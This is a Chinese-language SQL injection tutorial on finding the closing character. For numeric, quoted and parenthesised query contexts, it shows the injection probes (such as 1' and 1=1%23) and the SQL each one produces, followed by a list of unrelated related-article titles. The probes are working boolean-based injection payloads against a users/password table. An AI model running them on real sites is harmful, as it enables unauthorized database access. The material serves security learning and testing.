求閉合字元
數字型
select id, username,password from users where id = $id limit 0,1;
id輸入:3%23
select id, username,password from users where id = 3%23 limit 0,1;
試探方法:
id輸入:1'
select id, username,password from users where id = 1' limit 0,1; 語法錯誤,報錯
id輸入:1 and 1 =1%23
select id, username,password from users where id = 1 and 1 =1%23 limit 0,1;語法正確,查得出記錄
id輸入:1 and 1 =2%23
select id, username,password from users where id = 1 and 1 =2%23 limit 0,1; 語法正確,但查不出記錄
單引號
select id, username,password from users where id = '$id' limit 0,1;
id輸入:3'%23
select id, username,password from users where id = '3'%23' limit 0,1;
試探方法:
id輸入:1'
select id, username,password from users where id = '1'' limit 0,1; 語法錯誤,報錯
id輸入:1' and 1=1%23
select id, username,password from users where id = '1' and 1=1%23' limit 0,1;語法正確,查得出記錄
id輸入:1' and 1=2%23
select id, username,password from users where id = '1' and 1=2%23' limit 0,1;語法正確,但查不出記錄
雙引號
select id, username,password from users where id = "$id" limit 0,1;
id輸入:3"%23
select id, username,password from users where id = "3"%23" limit 0,1;
括號
select id, username,password from users where id in ($id);
id輸入:3)%23
select id, username,password from users where id in (3)%23);
id輸入:1,2,3)%23
select id, username,password from users where id in (1,2,3)%23);
括號加單引號
select id, username,password from users where id in ('$id');
id輸入:3')%23
select id, username,password from users where id in ('3')%23');
試探方法:
id輸入:1'
select id, username,password from users where id in ('1''); 語法錯誤,報錯
id輸入:1') and 1=1%23
select id, username,password from users where id in ('1') and 1=1%23'); 語法正確,查得出記錄
id輸入:1') and 1=2%23
select id, username,password from users where id in ('1') and 1=2%23'); 語法正確,但查不出記錄
括號加雙引號
select id, username,password from users where id in ("$id");
id輸入:3")%23
select id, username,password from users where id in ("3")%23");
試探方法:
id輸入:1'
select id, username,password from users where id in ("1'"); 語法錯誤,報錯
id輸入:1") and 1=1%23
select id, username,password from users where id in ("1") and 1=1%23"); 語法正確,查得出記錄
id輸入:1") and 1=2%23
select id, username,password from users where id in ("1") and 1=2%23"); 語法正確,但查不出記錄
相關文章
- 【集合論】關係閉包 ( 關係閉包求法 | 關係圖求閉包 | 關係矩陣求閉包 | 閉包運算與關係性質 | 閉包複合運算 )矩陣
- HTML標籤 閉合還是不閉合?HTML
- HTML標籤,閉合還是不閉合?HTML
- javascript如何檢查並閉合沒有閉合的html元素JavaScriptHTML
- HTML 標籤閉合HTML
- C語言中strlen求字串長度,求字元陣列長度(空字元,數字0,字元0,陣列部分初始化)C語言字串字元陣列
- 組合語言---判斷字元組合語言字元
- 求給定字串的平均字元長度字串字元
- 轉發精品:求極限、求積分、求微分、求導數、求曲,求全微分、求複合求導
- MySQL按指定字元合並及拆分MySql字元
- Hystrix:HystrixCollapser請求合併
- 【總結】求組合數的方法
- 求字串中不含重複字元的最長子串字串字元
- 合併HTTP請求vs並行HTTP請求,到底誰更快?HTTP並行
- 合併HTTP請求 vs 並行HTTP請求,到底誰更快?HTTP並行
- flutter 展開閉合案例 ExpansionTile 與 ExpansionPanelListFlutter
- 閉包用法結合例項詳解
- 結合例項學習|字元編碼和解碼字元
- 【Python】演算法之求組合Python演算法
- Spring Cloud Hystrix的請求合併SpringCloud
- POJ- 3094 Quicksum-給規律求字元值UI字元
- 清除浮動與閉合浮動區別
- httpWebRequest請求錯誤,基礎連線已經關閉: 連線被意外關閉HTTPWeb
- (問)get請求會對中文及特殊字元進行轉碼字元
- 求大神指導!!!YApi 如何結合 Jenkins???APIJenkins
- OkHttp、rxJava、Retrofit聯合網路請求(一)HTTPRxJava
- OkHttp、rxJava、Retrofit聯合網路請求(二)HTTPRxJava
- css中的閉合浮動是什麼意思CSS
- swift 3.0 閉包,專案使用例子,結合GCDSwiftGC
- 正則匹配閉合HTML標籤(支援巢狀)HTML巢狀
- 求陣列中k個數的所有組合陣列
- 保姆級教程 | Merge Request 分支合併請求
- sendBeacon 重新整理/關閉頁面之前傳送請求
- Python基礎(五)——閉包與lambda的結合Python
- java_求列舉所有的連續(或單個字元)的子串.Java字元
- Git多人合作,合併請求並解決衝突Git
- 求自然數的組合數的回溯演算法演算法
- Web Beacon 重新整理/關閉頁面之前傳送請求Web